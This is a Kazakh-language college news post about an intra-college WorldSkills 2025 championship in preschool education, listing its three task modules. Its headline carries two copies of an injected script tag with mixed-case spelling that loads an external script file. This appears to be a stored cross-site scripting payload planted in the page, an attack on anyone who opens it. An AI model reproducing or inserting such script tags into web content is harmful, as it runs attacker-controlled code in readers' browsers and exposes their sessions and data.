«WORLDSKILLS – 2025» КОЛЛЕДЖІШІЛІК ЧЕМПИОНАТЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.11.2024

2024 жылдың 6 қараша күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде  «Мектепке дейінгі тәрбие және оқыту» құзіретілігі бойынша «WORLDSKILLS – 2025»  КОЛЛЕДЖІШІЛІК ЧЕМПИОНАТЫ өтті. Чемпионат қатысушыларының реттілігі жеребе тарту бойынша анықталды. Білім жарысында қатысушылар 3 модуль бойынша тапсырма орындады:
А Модулі. «Мектеп жасына дейінгі балаларды оқыту және тәрбиелеу». Мақсаты – балалардың шағын топпен ұйымдастырылған оқу іс-әрекетінің үзіндісін әзірлеу және өткізу, қабілетін көрсету, таным және зияткерлік дағдыларын дамыту.
В Модулі. «Физикалық қасиеттерді дамыту». Жас ерекшеліктеріне сәйкес қимыл-қозғалыс ойынын әзірлеу  және ұйымдастырып өткізу. В модулі тапсырмасы негізінде қатысушылар жас ерекшелігіне сәйкес қимыл-қозғалыс ойынын ұйымдастырып өткізді.
С Модулі. «Ата-аналармен (заңды өкілдермен) және білім беру ұйымының қызметкерлерімен өзара әрекеттесу». Бұл модуль бойынша ата-аналарға және білім беру ұйымының қызметкерлеріне арналған ақпараттық демонстрациялық  стенд әзірленіп таныстырылды.
«Мектепке дейінгі тәрбие және оқыту» құзіреттілгі бойынша «Worldskills – 2025»  колледжішілік чемпионаты сәтті өтті.

Просмотров: 491


Пікір қосу



Деректерді қолтаңбаға қосу